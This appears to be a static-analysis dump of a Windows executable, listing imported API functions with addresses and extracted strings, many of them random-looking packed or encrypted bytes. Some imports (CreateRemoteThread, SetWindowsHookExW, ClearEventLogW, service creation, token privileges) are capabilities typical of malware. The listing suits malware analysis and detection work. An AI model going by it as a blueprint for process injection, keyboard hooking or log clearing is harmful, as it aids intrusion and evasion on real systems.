SetProcessAffinityMask 00413828 GetSystemInfo 0041382C
FlushInstructionCache 00413830
SwitchToThread 00413834 GetCurrentProcessId 00413838
DosDateTimeToFileTime 0041383C
EscapeCommFunction 00413840
HeapDestroy 00413844
SetCurrentDirectoryA 00413848
GetConsoleScreenBufferInfo 0041384C FindFirstFileA 00413850
CreateNamedPipeA 00413854
GetThreadLocale 00413858 GetTempFileNameA 0041385C
GlobalUnWire 00413860
SwitchToFiber 00413864 LocalFileTimeToFileTime 00413868
CreateTapePartition 0041386C
GlobalAddAtomW 00413870
SetThreadDesktop 00413214
GetInputState 00413218 SetKeyboardState 0041321C
SetMenuItemInfoW 00413220
GetMenuItemID 00413224 GrayStringW 00413228
EmptyClipboard 0041322C
CreatePopupMenu 00413230 LoadStringW 00413234
CallMsgFilterA 00413238
GetActiveWindow 0041323C RegisterHotKey 00413240
DialogBoxParamA 00413244
ExcludeUpdateRgn 00413248 GetAncestor 0041324C
GetSysColor 00413250
GetDlgCtrlID 00413254 DdeFreeStringHandle 00413258
LoadStringA 0041325C
MonitorFromWindow 00413260
SetDeskWallpaper 00413264
DrawFrame 00413268
RegisterWindowMessageA 0041326C GetMenuItemRect 00413270
LoadMenuIndirectW 00413274
EnumDisplaySettingsExW 00413278 BeginDeferWindowPos 0041327C
OemToCharW 00413280
GetMonitorInfoW 00413284 NotifyWinEvent 00413288
GetKeyState 0041328C
RemoveMenu 00413290 SetDlgItemTextW 00413294
GetDesktopWindow 00413298
GetMessageTime 0041329C GetClipCursor 004132A0
UpdateWindow 004132A4
GetPriorityClipboardFormat 004132A8 DrawFocusRect 004132AC
DragDetect 004132B0
GetUpdateRect 004132B4 GetCursor 004132B8
SetLastErrorEx 004132BC
LoadBitmapA 004132C0 CharLowerA 004132C4
SetMenuDefaultItem 004132C8
DdeCreateStringHandleW 004132CC GetDialogBaseUnits 004132D0
WindowFromDC 004132D4
GetAltTabInfo 004132D8 GetMenuState 004132DC
DdeClientTransaction 004132E0 FindWindowW 004132E4
CreateWindowExA 004132E8
EnumDisplaySettingsA 004132EC DdeInitializeA 004132F0
EnumPropsExW 004132F4
OemToCharBuffW 004132F8
SetWindowsHookExW 004132FC
UnhookWindowsHookEx 00413300
SetMenuItemInfoA 00413304 WinHelpW 00413308
GetKeyboardLayout 0041330C
SetClipboardViewer 00413310 GetNextDlgGroupItem 00413314
ChildWindowFromPoint 00413318
EndPaint 0041331C EndMenu 00413320
ValidateRgn 00413324
RegisterDragDrop 00413540
OleCreateLinkToFile 00413544 StgCreateStorageEx 00413548
CoGetPSClsid 0041354C
OleCreateLinkEx 00413550 OleRegGetUserType 00413554
OleCreateLinkFromDataEx 00413558
CoRegisterChannelHook 0041355C OleRegGetMiscStatus 00413560
CreateOleAdviseHolder 00413564
CoRegisterSurrogate 00413568 OleCreateFromDataEx 0041356C
CoDosDateTimeToFileTime 00413570
PropVariantClear 00413574 ReadClassStg 00413578
StgOpenAsyncDocfileOnIFillLockBytes 0041357C
OleCreateDefaultHandler 00413580
OleCreateMenuDescriptor 00413584
PathRemoveBlanksW 0041358C
UrlCompareA 00413590
PathFindOnPathA 00413594
SHAutoComplete 00413598 UrlGetLocationW 0041359C
PathIsRelativeW 004135A0
SHRegWriteUSValueW 004135A4 PathIsContentTypeW 004135A8
StrToIntW 004135AC
PathIsSameRootW 004135B0 SHRegQueryInfoUSKeyW 004135B4
SHRegGetUSValueA 004135B8
SHDeleteEmptyKeyW 004135BC StrCatW 004135C0
PathIsUNCW 004
ColorHLSToRGB 004135C8 PathStripPathW 004135CC
HashData 004135D0
StrChrW 004135D4 SHRegCloseUSKey 004135D8
StrDupA 004135DC
UrlGetPartW 004135E0 SHEnumValueA 004135E4
SHSetValueA 004135E8
PathMakeSystemFolderW 004135EC SHSkipJunction 004135F0
PathFindSuffixArrayW 004135F4
PathIsURLA 004135F8 PathGetDriveNumberA 004135FC
SHCopyKeyA 00413600
PathRenameExtensionA 00413604 StrNCatA 00413608
PathFileExistsA 0041360C StrPBrkA 00413610
PathCombineA 00413614
PathCompactPathW 00413618 PathRemoveArgsA 0041361C
SHRegQueryInfoUSKeyA 00413620
StrToIntExA 00413624
StrStrW 00413628
PathFindSuffixArrayA 0041362C
SHStrDupW 00413630 StrRChrIW 00413634
PathCanonicalizeA 00413638
StrRetToBufA 0041363C StrCmpIW 00413640
SHRegSetUSValueA 00413644
SHRegOpenUSKeyW 00413648 SHRegWriteUSValueA 0041364C
StrRetToStrA 00413650
UrlHashA 00413654
WaitForSingleObject 00413874
CreateMutexA 00413878 GetShortPathNameW 0041387C
FoldStringW 00413880
CompareStringA 00413884 ReadFile 00413888
FreeLibraryAndExitThread 0041388C
CompareFileTime 00413890 GetNamedPipeHandleStateA 00413894
GetUserDefaultLangID 00413898
SetDefaultCommConfigA 0041389C GetModuleHandleA 004138A0
GetSystemTime 004138A4
GetVolumeInformationW 004138A8 GetLongPathNameA 004138AC
Process32Next 004138B0
SetFileApisToANSI 004138B4 FlushFileBuffers 004138B8
GetSystemDirectoryW 004138BC
GetCommModemStatus 004138C0
GlobalSize 004138C4
SetFileAttributesA 004138C8
SetThreadPriority 004138CC CancelIo 004138D0
EnumCalendarInfoA 004138D4
TlsFree 004138D8 QueryPerformanceCounter 004138DC
GetCurrentDirectoryW 004138E0
WriteFileGather 004138E4 DefineDosDeviceW 004138E8
SetDefaultCommConfigW 004138EC
GetDevicePowerState 004138F0 SetPriorityClass 004138F4
GetPrivateProfileStringA 004138F8
GetNumberOfConsoleInputEvents 004138FC ReadDirectoryChangesW 00413900
EndUpdateResourceA 00413904
IsDBCSLeadByteEx 00413908 OpenMutexA 0041390C
SetTimeZoneInformation 00413910
lstrlen 00413914 CreateThread 00413918
CreateRemoteThread 0041391C
CompareStringW 00413920 SetProcessShutdownParameters 00413924
Toolhelp32ReadProcessMemory 00413928
GetPrivateProfileStructW 0041392C GetProcessHeaps 00413930
GetDateFormatW 00413934
SetTapeParameters 00413938 SetConsoleActiveScreenBuffer 0041393C
OpenMutexW 00413940 IsSystemResumeAutomatic 00413944
SetTapePosition 00413948
EraseTape 0041394C PostQueuedCompletionStatus 00413950
LocalFree 00413954
GetThreadPriority 00413958
FillConsoleOutputCharacterW 0041395C
lstrcmp 00413960
WaitForSingleObjectEx 00413964 GetComputerNameW 00413968
GetThreadTimes 0041396C
EnumCalendarInfoW 00413970 BackupWrite 00413974
SuspendThread 00413978
Comment Strings:
.text:004010A0 00000015 C nPniTP2S.~4-2$Ucnn-G
.text:00401A8C 00000010 C 5hG5`A$d$_fnVF9
.text:00401B28 00000011 C Yx>5;R[¦YA/<QlGy
.text:00401C1C 00000012 C >F;F2mS4d+Y¦[\\i(o
.text:00401C44 0000001F C Q)+X\"½[ad?Fn`+XdQVD-(^Ad>x:2`i
.text:00401C63 00000006 C ha[m_
.text:00402C0C 00000023 C Gn)4V8\\9#TnPcQ~(9kiF[#F:fF$^Q//#<5
.text:0040360C 00000005 C UhxP
.text:004037B1 0000001F C \\eGl#eS?)AkVUûP\"½a2>_5on.;RQ]x
.text:00403880 00000016 C c^+;V-<#_b^kV~2a-8P?/
.text:00403B30 0000001C C hRn\"#h8V$D3`G[iU\"cdXT!V`Rna
.text:00403B78 00000017 C GSi+nab(Q(R>6x)e8yVnU5
.text:00403BA1 00000021 C 5ûS8-½<<fo3nYmhn`-_9-h`4`V$i]Y.o
.text:0040445C 00000012 C ?Fx<9A6#5<h);<eb$
.rdata:00413980 0000000A C Xz!7j=D\aZf
.rdata:00413994 00000009 C d]5\r RP.h
.rdata:004139BD 00000008 C HhX<APc=
.rdata:004139C8 0000000B C jVX}pBgCO\t
.rdata:004139D5 00000009 C 7MGt_jXSZ
.rdata:004139DF 00000009 C aXb\"\x1B%jCD
.rdata:004139F3 00000007 C Z.0H!/V
.rdata:004139FB 00000009 C ~T<\x1B\\\tZ\x1Br
.rdata:00413A05 00000009 C -Y]%J()\vL
.rdata:00413A10 00000010 C T\n\b@@VecKiDW|Y\v\t
.rdata:00413A23 0000000E C $x4GFZ\\%k*oTW5
.rdata:00413A35 00000008 C [>&{~~ 7
.rdata:00413A3E 00000006 C 7>|n\vO
.rdata:00413A45 00000007 C /zYjKK<
.rdata:00413A56 00000007 C $x\\XgBx
.rdata:00413A5E 00000006 C 3&.Hw
.rdata:00414462 00000016 C BuildTrusteeWithNameW
.rdata:0041447A 00000010 C GetTrusteeNameA
.rdata:0041448C 00000019 C BuildImpersonateTrusteeA
.rdata:004144A8 00000016 C GetNamedSecurityInfoW
.rdata:004144C0 00000019 C CryptGetDefaultProviderA
.rdata:004144DC 00000012 C CryptDuplicateKey
.rdata:004144F0 0000000F C RegSetValueExW
.rdata:00414502 00000016 C DeregisterEventSource
.rdata:0041451A 00000019 C BuildSecurityDescriptorA
.rdata:00414536 00000018 C InitiateSystemShutdownW
.rdata:00414550 00000018 C RegQueryMultipleValuesW
.rdata:0041456A 00000013 C LookupAccountNameW
.rdata:00414580 00000012 C RegSetKeySecurity
.rdata:00414594 0000000E C RegEnumValueW
.rdata:004145A4 00000019 C SetServiceObjectSecurity
.rdata:004145C0 00000015 C RegisterEventSourceA
.rdata:004145D8 00000017 C SetEntriesInAuditListW
.rdata:004145F2 00000015 C BuildTrusteeWithSidW
.rdata:0041460A 0000000C C RegLoadKeyW
.rdata:00414618 00000018 C GetOldestEventLogRecord
.rdata:00414632 00000012 C LookupAccountSidA
.rdata:00414646 00000010 C GetTrusteeTypeW
.rdata:00414658 00000015 C LookupPrivilegeNameA
.rdata:00414670 0000000E C CryptHashData
.rdata:00414680 0000001B C ImpersonateNamedPipeClient
.rdata:0041469E 00000016 C ObjectOpenAuditAlarmW
.rdata:004146B6 0000000E C RegEnumKeyExA
.rdata:004146C6 00000019 C BuildSecurityDescriptorW
.rdata:004146E2 00000016 C LookupPrivilegeValueA
.rdata:004146FA 0000000A C DeleteAce
.rdata:00414706 00000011 C OpenProcessToken
.rdata:0041471A 0000000E C DeleteService
.rdata:0041472A 0000000D C CryptDecrypt
.rdata:0041473A 00000015 C CreateProcessAsUserW
.rdata:00414752 0000000D C RevertToSelf
.rdata:00414762 0000001A C IsValidSecurityDescriptor
.rdata:0041477E 0000000F C RegReplaceKeyW
.rdata:00416AC4 00000009 C SetEvent
.rdata:00416AD0 00000018 C SetProcessPriorityBoost
.rdata:00416AEA 0000000E C IsBadWritePtr
.rdata:00416AFA 00000010 C TerminateThread
.rdata:00416B0C 00000013 C EnumResourceTypesW
.rdata:00416B22 00000016 C GetPrivateProfileIntW
.rdata:00416B3A 00000011 C OpenFileMappingA
.rdata:00415152 00000010 C GetMenuItemRect
.rdata:00415164 00000012 C LoadMenuIndirectW
.rdata:00415178 00000017 C EnumDisplaySettingsExW
.rdata:00415192 00000014 C BeginDeferWindowPos
.rdata:004151A8 0000000B C OemToCharW
.rdata:004151B6 00000010 C GetMonitorInfoW
.rdata:004151C8 0000000F C NotifyWinEvent
.rdata:004151DA 0000000C C GetKeyState
.rdata:004151E8 0000000B C RemoveMenu
.rdata:004151F6 00000010 C SetDlgItemTextW
.rdata:00415208 00000011 C GetDesktopWindow
.rdata:0041521C 0000000F C GetMessageTime
.rdata:0041522E 0000000E C GetClipCursor
.rdata:0041523E 0000000D C UpdateWindow
.rdata:0041524E 0000001B C GetPriorityClipboardFormat
.rdata:0041526C 0000000E C DrawFocusRect
.rdata:0041527C 0000000B C DragDetect
.rdata:0041528A 0000000E C GetUpdateRect
.rdata:0041529A 0000000A C GetCursor
.rdata:004152A6 0000000F C SetLastErrorEx
.rdata:004152B8 0000000C C LoadBitmapA
.rdata:004152C6 0000000B C CharLowerA
.rdata:004152D4 00000013 C SetMenuDefaultItem
.rdata:004152EA 00000017 C DdeCreateStringHandleW
.rdata:00415304 00000013 C GetDialogBaseUnits
.rdata:0041531A 0000000D C WindowFromDC
.rdata:0041532A 0000000E C GetAltTabInfo
.rdata:0041533A 0000000D C GetMenuState
.rdata:0041534A 00000015 C DdeClientTransaction
.rdata:00415362 0000000C C FindWindowW
.rdata:00415370 00000010 C CreateWindowExA
.rdata:00415382 00000015 C EnumDisplaySettingsA
.rdata:0041539A 0000000F C DdeInitializeA
.rdata:004153AC 0000000D C EnumPropsExW
.rdata:004153BC 0000000F C OemToCharBuffW
.rdata:004153CE 00000012 C SetWindowsHookExW
.rdata:004153E2 00000014 C UnhookWindowsHookEx
.rdata:004153F8 00000011 C SetMenuItemInfoA
.rdata:0041540C 00000009 C WinHelpW
.rdata:00415418 00000012 C GetKeyboardLayout
.rdata:0041542C 00000013 C SetClipboardViewer
.rdata:00415442 00000014 C GetNextDlgGroupItem
.rdata:00415458 00000015 C ChildWindowFromPoint
.rdata:00415470 00000009 C EndPaint
.rdata:0041547C 00000008 C EndMenu
.rdata:00415486 0000000C C ValidateRgn
.rdata:00415494 00000010 C GetKeyNameTextA
.rdata:004154A6 0000000D C SetWindowPos
.rdata:004154B6 00000017 C RegisterWindowMessageW
.rdata:004154D0 0000000A C UnionRect
.rdata:004154DC 00000012 C SetCaretBlinkTime
.rdata:004154F0 00000018 C DestroyAcceleratorTable
.rdata:0041550A 00000017 C ChangeDisplaySettingsW
.rdata:00415524 0000000B C LoadImageA
.rdata:00415532 00000013 C SetMenuItemBitmaps
.rdata:00415548 00000010 C DdeUnaccessData
.rdata:0041555A 0000000F C DefWindowProcW
.rdata:0041556C 00000017 C CreateIconFromResource
.rdata:00415586 0000000C C EditWndProc
.rdata:00415594 0000000C C ChangeMenuW
.rdata:00414790 00000015 C CryptAcquireContextW
.rdata:004147A8 00000012 C LookupAccountSidW
.rdata:004147BC 00000018 C SetEntriesInAccessListW
.rdata:004147D6 00000010 C RegDeleteValueA
.rdata:004147E8 00000011 C RegQueryValueExA
.rdata:004147FC 0000001A C GetSidIdentifierAuthority
.rdata:00414818 00000012 C CryptGetHashParam
.rdata:0041482C 0000001D C PrivilegedServiceAuditAlarmA
.rdata:0041484C 00000028 C BuildImpersonateExplicitAccessWithNameA
.rdata:00414876 0000000D C GetLengthSid
.rdata:00414886 0000000F C CryptImportKey
.rdata:00414898 00000019 C AllocateAndInitializeSid
.rdata:004148B4 00000028 C BuildImpersonateExplicitAccessWithNameW
.rdata:004148DE 0000000F C CryptSignHashW
.rdata:004148F0 00000017 C GetServiceDisplayNameA
.rdata:0041490A 00000017 C EnumDependentServicesA
.rdata:00414924 00000014 C CryptReleaseContext
.rdata:0041493A 0000001B C GetExplicitEntriesFromAclW
.rdata:00414958 0000000D C GetUserNameW
.rdata:00414968 00000014 C CryptEnumProvidersW
.rdata:0041497E 00000011 C FindFirstFreeAce
.rdata:00414992 00000013 C CloseServiceHandle
.rdata:004149A8 00000015 C GetCurrentHwProfileW
.rdata:004149C0 00000017 C CancelOverlappedAccess
.rdata:004149DA 0000000E C StartServiceA
.rdata:004149EA 0000000C C RegCloseKey
.rdata:004149F8 0000000F C RegQueryValueA
.rdata:00414A0A 00000016 C CryptVerifySignatureW
.rdata:00414A22 00000016 C AdjustTokenPrivileges
.rdata:00414A3A 00000013 C QueryServiceStatus
.rdata:00414A50 00000014 C RegConnectRegistryA
.rdata:00414A66 00000014 C GetTokenInformation
.rdata:00414A7C 0000001F C GetAccessPermissionsForObjectW
.rdata:00414A9E 0000000F C RegQueryValueW
.rdata:00414AB0 0000001A C AccessCheckAndAuditAlarmW
.rdata:00414ACC 0000001A C SetSecurityDescriptorSacl
.rdata:00414AE8 00000016 C AreAnyAccessesGranted
.rdata:00414B00 00000017 C ObjectCloseAuditAlarmA
.rdata:00414B1A 00000014 C QueryServiceConfigA
.rdata:00414B30 0000000F C ClearEventLogW
.rdata:00414B42 0000000E C RegUnLoadKeyA
.rdata:00414B52 00000015 C LookupPrivilegeNameW
.rdata:00414B6A 00000010 C GetSecurityInfo
.rdata:00414B7C 0000000E C RegEnumKeyExW
.rdata:00414B8C 0000001B C ObjectPrivilegeAuditAlarmW
.rdata:00414BAA 00000010 C GetTrusteeTypeA
.rdata:00414BBC 0000000E C RegOpenKeyExW
.rdata:00414BCC 0000000E C RegCreateKeyA
.rdata:00414BDC 0000000E C IsTextUnicode
.rdata:00414BEC 0000000E C OpenEventLogW
.rdata:00414BFC 00000018 C CryptEnumProviderTypesW
.rdata:00414C16 0000000F C RegRestoreKeyW
.rdata:00414C28 00000012 C CryptGetProvParam
.rdata:00414C3C 00000015 C ChangeServiceConfigA
.rdata:00414C54 0000000C C RegSaveKeyA
.rdata:00414C62 0000001D C BuildExplicitAccessWithNameW
.rdata:00414C82 0000001A C GetSecurityDescriptorSacl
.rdata:00414C9E 0000000C C RegLoadKeyA
.rdata:00414CAC 00000014 C GetMultipleTrusteeA
.rdata:00414CC2 00000014 C AddAccessAllowedAce
.rdata:00414CD8 00000012 C SetAclInformation
.rdata:00414CEC 0000000F C ControlService
.rdata:00414CFE 00000013 C GetSecurityInfoExW
.rdata:00414D14 0000000F C RegRestoreKeyA
.rdata:00414D26 00000016 C ObjectOpenAuditAlarmA
.rdata:00414D3E 00000008 C CopySid
.rdata:00414D48 0000000F C OpenSCManagerA
.rdata:00414D5A 00000018 C RegQueryMultipleValuesA
.rdata:00414D74 00000010 C OpenThreadToken
.rdata:00414D86 0000000B C LogonUserW
.rdata:004155A2 00000009 C DrawEdge
.rdata:004155AE 0000000B C GetDlgItem
.rdata:004155BC 00000016 C InternalGetWindowText
.rdata:004155D4 00000017 C ChangeDisplaySettingsA
.rdata:004155EE 0000000C C InsertMenuW
.rdata:004155FC 0000000C C SetMenuInfo
.rdata:0041560A 00000011 C DdeSetUserHandle
.rdata:0041561E 0000000C C GetMessageW
.rdata:0041562C 0000000C C ModifyMenuW
.rdata:0041563A 0000001C C MsgWaitForMultipleObjectsEx
.rdata:00415658 00000012 C DrawAnimatedRects
.rdata:0041566C 00000016 C GetUserObjectSecurity
.rdata:00415684 0000001B C GetMenuCheckMarkDimensions
.rdata:004156A2 00000008 C GetMenu
.rdata:004156AC 0000000E C DestroyCursor
.rdata:004156BC 00000013 C IsDlgButtonChecked
.rdata:004156D2 00000012 C GetCaretBlinkTime
.rdata:004156E6 0000000F C GetShellWindow
.rdata:004156F8 00000012 C GetClipboardOwner
.rdata:0041570C 00000010 C CallWindowProcA
.rdata:0041571E 00000013 C GetWindowPlacement
.rdata:00415734 0000000F C TabbedTextOutA
.rdata:00415746 00000014 C LoadKeyboardLayoutW
.rdata:0041575C 00000009 C IsZoomed
.rdata:00415768 00000018 C CreateAcceleratorTableW
.rdata:00415782 00000009 C FillRect
.rdata:0041578E 00000013 C RealGetWindowClass
.rdata:004157A4 0000000C C ToUnicodeEx
.rdata:004157B2 00000013 C OpenWindowStationW
.rdata:004157C8 0000000D C IsCharUpperA
.rdata:004157D8 0000000F C InvalidateRect
.rdata:004157EA 0000000F C GetMenuStringW
.rdata:004157FC 00000011 C IsDialogMessageW
.rdata:00415810 0000000F C ReleaseCapture
.rdata:00415822 0000000E C GetSystemMenu
.rdata:00415832 0000000B C SetCapture
.rdata:00415840 0000000C C GrayStringA
.rdata:0041584E 0000000E C SwitchDesktop
.rdata:0041585E 00000008 C SetRect
.rdata:00415868 0000000D C GetUpdateRgn
.rdata:00415878 0000000E C GetDlgItemInt
.rdata:00415888 0000000A C LoadMenuA
.rdata:00415892 0000000B C USER32.dll
.rdata:004158A0 00000011 C CoCreateInstance
.rdata:004158B4 00000018 C CoRegisterMessageFilter
.rdata:004158CE 0000000E C OleCreateLink
.rdata:004158DE 0000000C C OleCreateEx
.rdata:004158EC 00000008 C OleLoad
.rdata:004158F6 0000000E C GetConvertStg
.rdata:00415906 00000015 C CoQueryReleaseObject
.rdata:0041591E 00000017 C CreateDataAdviseHolder
.rdata:00415938 0000001F C CoGetInterfaceAndReleaseStream
.rdata:0041595A 0000000E C WriteClassStm
.rdata:0041596A 0000001B C StgGetIFillLockBytesOnFile
.rdata:00415988 00000010 C OleBuildVersion
.rdata:0041599A 00000014 C OleRegEnumFormatEtc
.rdata:004159B0 00000016 C GetRunningObjectTable
.rdata:004159C8 00000010 C UtGetDvtd32Info
.rdata:004159DA 00000018 C OleCreateStaticFromData
.rdata:004159F4 00000012 C OleCreateFromFile
.rdata:00415A08 00000011 C OleDoAutoConvert
.rdata:00415A1C 00000013 C OpenOrCreateStream
.rdata:00415A32 00000015 C OleNoteObjectVisible
.rdata:00415A4A 00000012 C CreateAntiMoniker
.rdata:00415A5E 00000020 C OleMetafilePictFromIconAndLabel
.rdata:00415A80 00000015 C CoUnmarshalInterface
.rdata:00415A98 00000019 C OleCreateEmbeddingHelper
.rdata:00415AB4 00000016 C CoRegisterClassObject
.rdata:00415ACC 00000015 C FreePropVariantArray
.rdata:00415AE4 00000012 C OleSetAutoConvert
.rdata:00414D94 00000011 C CryptDestroyHash
.rdata:00414DA8 00000015 C AbortSystemShutdownW
.rdata:00414DC0 00000012 C GetAclInformation
.rdata:00414DD4 0000000F C CreateServiceW
.rdata:00414DE6 0000000C C CryptGenKey
.rdata:00414DF4 0000001F C LookupSecurityDescriptorPartsW
.rdata:00414E16 00000023 C ConvertAccessToSecurityDescriptorA
.rdata:00414E3C 00000018 C SetEntriesInAccessListA
.rdata:00414E56 00000015 C AbortSystemShutdownA
.rdata:00414E6E 00000011 C SetEntriesInAclW
.rdata:00414E82 00000011 C GetFileSecurityA
.rdata:00414E96 0000000E C OpenEventLogA
.rdata:00414EA6 00000012 C CryptSetHashParam
.rdata:00414EBA 00000014 C CryptSetProviderExA
.rdata:00414ED0 00000014 C QueryServiceConfigW
.rdata:00414EE6 00000014 C CryptSetProviderExW
.rdata:00414EFC 00000014 C OpenBackupEventLogW
.rdata:00414F10 0000000D C ADVAPI32.dll
.rdata:00414F20 00000014 C SendMessageTimeoutW
.rdata:00414F36 00000011 C TileChildWindows
.rdata:00414F4A 00000008 C EndTask
.rdata:00414F54 00000011 C IsDialogMessageA
.rdata:00414F68 00000013 C DdeQueryNextServer
.rdata:00414F7E 0000000E C FlashWindowEx
.rdata:00414F8E 00000017 C GetKeyboardLayoutNameA
.rdata:00414FA8 00000012 C DdeFreeDataHandle
.rdata:00414FBC 00000011 C SetThreadDesktop
.rdata:00414FD0 0000000E C GetInputState
.rdata:00414FE0 00000011 C SetKeyboardState
.rdata:00414FF4 00000011 C SetMenuItemInfoW
.rdata:00415008 0000000E C GetMenuItemID
.rdata:00415018 0000000C C GrayStringW
.rdata:00415026 0000000F C EmptyClipboard
.rdata:00415038 00000010 C CreatePopupMenu
.rdata:0041504A 0000000C C LoadStringW
.rdata:00415058 0000000F C CallMsgFilterA
.rdata:0041506A 00000010 C GetActiveWindow
.rdata:0041507C 0000000F C RegisterHotKey
.rdata:0041508E 00000010 C DialogBoxParamA
.rdata:004150A0 00000011 C ExcludeUpdateRgn
.rdata:004150B4 0000000C C GetAncestor
.rdata:004150C2 0000000C C GetSysColor
.rdata:004150D0 0000000D C GetDlgCtrlID
.rdata:004150E0 00000014 C DdeFreeStringHandle
.rdata:004150F6 0000000C C LoadStringA
.rdata:00415104 00000012 C MonitorFromWindow
.rdata:00415118 00000011 C SetDeskWallpaper
.rdata:0041512C 0000000A C DrawFrame
.rdata:00415138 00000017 C RegisterWindowMessageA
.rdata:00415B96 0000001C C CoGetCurrentLogicalThreadId
.rdata:00415BB4 00000012 C CreateItemMoniker
.rdata:00415BC8 0000000C C CoGetMalloc
.rdata:00415BD6 0000000E C WriteClassStg
.rdata:00415BE6 00000011 C ReadStringStream
.rdata:00415BFA 00000017 C CreateGenericComposite
.rdata:00415C14 00000010 C PropVariantCopy
.rdata:00415C26 00000011 C StgOpenStorageEx
.rdata:00415C3A 00000008 C OleSave
.rdata:00415C44 0000000E C IsAccelerator
.rdata:00415C54 0000000C C BindMoniker
.rdata:00415C62 00000011 C CoGetCallContext
.rdata:00415C76 00000016 C CoFreeUnusedLibraries
.rdata:00415C8E 0000000F C StgOpenStorage
.rdata:00415CA0 00000013 C UpdateDCOMSettings
.rdata:00415CB6 00000014 C CoGetMarshalSizeMax
.rdata:00415CCC 00000011 C OleGetIconOfFile
.rdata:00415CE0 0000001B C StgOpenStorageOnILockBytes
.rdata:00415CFE 00000014 C CoQueryProxyBlanket
.rdata:00415D14 00000018 C UtConvertDvtd16toDvtd32
.rdata:00415D2E 0000001E C CoQueryAuthenticationServices
.rdata:00415AF8 00000018 C OleTranslateAccelerator
.rdata:00415B12 00000010 C OleSaveToStream
.rdata:00415B24 00000012 C CoGetTreatAsClass
.rdata:00415B38 0000000F C CoRevertToSelf
.rdata:00415B4A 0000000F C CoInitializeEx
.rdata:00415B5C 00000016 C OleIsCurrentClipboard
.rdata:00415B74 00000020 C OleConvertIStorageToOLESTREAMEx
.rdata:00416156 0000000A C StrToIntW
.rdata:00416162 00000010 C PathIsSameRootW
.rdata:00416174 00000015 C SHRegQueryInfoUSKeyW
.rdata:0041618C 00000011 C SHRegGetUSValueA
.rdata:004161A0 00000012 C SHDeleteEmptyKeyW
.rdata:004161B4 00000008 C StrCatW
.rdata:004161BE 0000000B C PathIsUNCW
.rdata:004161CC 0000000E C ColorHLSToRGB
.rdata:004161DC 0000000F C PathStripPathW
.rdata:004161EE 00000009 C HashData
.rdata:004161FA 00000008 C StrChrW
.rdata:00416204 00000010 C SHRegCloseUSKey
.rdata:00416216 00000008 C StrDupA
.rdata:00416220 0000000C C UrlGetPartW
.rdata:0041622E 0000000D C SHEnumValueA
.rdata:0041623E 0000000C C SHSetValueA
.rdata:0041624C 00000016 C PathMakeSystemFolderW
.rdata:00416264 0000000F C SHSkipJunction
.rdata:00416276 00000015 C PathFindSuffixArrayW
.rdata:0041628E 0000000B C PathIsURLA
.rdata:0041629C 00000014 C PathGetDriveNumberA
.rdata:004162B2 0000000B C SHCopyKeyA
.rdata:004162C0 00000015 C PathRenameExtensionA
.rdata:004162D8 00000009 C StrNCatA
.rdata:004162E4 00000010 C PathFileExistsA
.rdata:004162F6 00000009 C StrPBrkA
.rdata:00416302 0000000D C PathCombineA
.rdata:00416312 00000011 C PathCompactPathW
.rdata:00416326 00000010 C PathRemoveArgsA
.rdata:00416338 00000015 C SHRegQueryInfoUSKeyA
.rdata:00416350 0000000C C StrToIntExA
.rdata:0041635E 00000008 C StrStrW
.rdata:00416368 00000015 C PathFindSuffixArrayA
.rdata:00416380 0000000A C SHStrDupW
.rdata:0041638C 0000000A C StrRChrIW
.rdata:00416398 00000012 C PathCanonicalizeA
.rdata:004163AC 0000000D C StrRetToBufA
.rdata:004163BC 00000009 C StrCmpIW
.rdata:004163C8 00000011 C SHRegSetUSValueA
.rdata:004163DC 00000010 C SHRegOpenUSKeyW
.rdata:004163EE 00000013 C SHRegWriteUSValueA
.rdata:00416404 0000000D C StrRetToStrA
.rdata:00416414 00000009 C UrlHashA
.rdata:00416420 00000013 C PathFindExtensionA
.rdata:00416436 00000011 C SHRegGetUSValueW
.rdata:0041644A 0000000C C UrlGetPartA
.rdata:00416458 0000000A C StrToIntA
.rdata:00416464 00000009 C StrCSpnW
.rdata:00416470 00000016 C PathMakeSystemFolderA
.rdata:00416488 00000010 C PathFileExistsW
.rdata:0041649A 00000011 C PathGetCharTypeA
.rdata:004164AE 0000000A C StrRStrIW
.rdata:004164BA 0000000C C UrlCombineW
.rdata:004164C8 00000012 C SHRegCreateUSKeyW
.rdata:004164DC 00000011 C PathGetCharTypeW
.rdata:004164F0 00000014 C PathSetDlgItemPathW
.rdata:00416506 00000011 C UrlCanonicalizeA
.rdata:0041651A 00000010 C PathIsFileSpecW
.rdata:0041652C 00000014 C PathIsSystemFolderA
.rdata:00416542 0000000F C PathBuildRootW
.rdata:00416554 00000017 C SHRegDeleteEmptyUSKeyA
.rdata:0041656E 00000009 C ChrCmpIW
.rdata:0041657A 00000015 C SHRegGetBoolUSValueA
.rdata:00415D4E 00000010 C OleSetClipboard
.rdata:00415D60 0000000B C DoDragDrop
.rdata:00415D6E 0000000C C IsEqualGUID
.rdata:00415D7C 00000015 C CoReleaseMarshalData
.rdata:00415D94 0000000A C OleCreate
.rdata:00415DA0 00000015 C CoQueryClientBlanket
.rdata:00415DB8 0000000D C ReadClassStm
.rdata:00415DC8 00000011 C ReleaseStgMedium
.rdata:00415DDC 00000012 C CreateFileMoniker
.rdata:00415DF0 00000015 C OleSetMenuDescriptor
.rdata:00415E08 00000015 C CreatePointerMoniker
.rdata:00415E20 0000000F C CoTreatAsClass
.rdata:00415E32 00000013 C CoFreeAllLibraries
.rdata:00415E48 00000021 C StgGetIFillLockBytesOnILockBytes
.rdata:00415E6C 0000001A C CreateILockBytesOnHGlobal
.rdata:00415E88 00000014 C CreateObjrefMoniker
.rdata:00415E9E 0000000E C CreateBindCtx
.rdata:00415EAE 0000000E C StringFromIID
.rdata:00415EBE 00000015 C CoInitializeSecurity
.rdata:00415ED6 0000000F C CoBuildVersion
.rdata:00415EE8 00000012 C WriteStringStream
.rdata:00415EFC 0000001E C CoCreateFreeThreadedMarshaler
.rdata:00415F1C 00000011 C RegisterDragDrop
.rdata:00415F30 00000014 C OleCreateLinkToFile
.rdata:00415F46 00000013 C StgCreateStorageEx
.rdata:00415F5C 0000000D C CoGetPSClsid
.rdata:00415F6C 00000010 C OleCreateLinkEx
.rdata:00415F7E 00000012 C OleRegGetUserType
.rdata:00415F92 00000018 C OleCreateLinkFromDataEx
.rdata:00415FAC 00000016 C CoRegisterChannelHook
.rdata:00415FC4 00000014 C OleRegGetMiscStatus
.rdata:00415FDA 00000016 C CreateOleAdviseHolder
.rdata:00415FF2 00000014 C CoRegisterSurrogate
.rdata:00416008 00000014 C OleCreateFromDataEx
.rdata:0041601E 00000018 C CoDosDateTimeToFileTime
.rdata:00416038 00000011 C PropVariantClear
.rdata:0041604C 0000000D C ReadClassStg
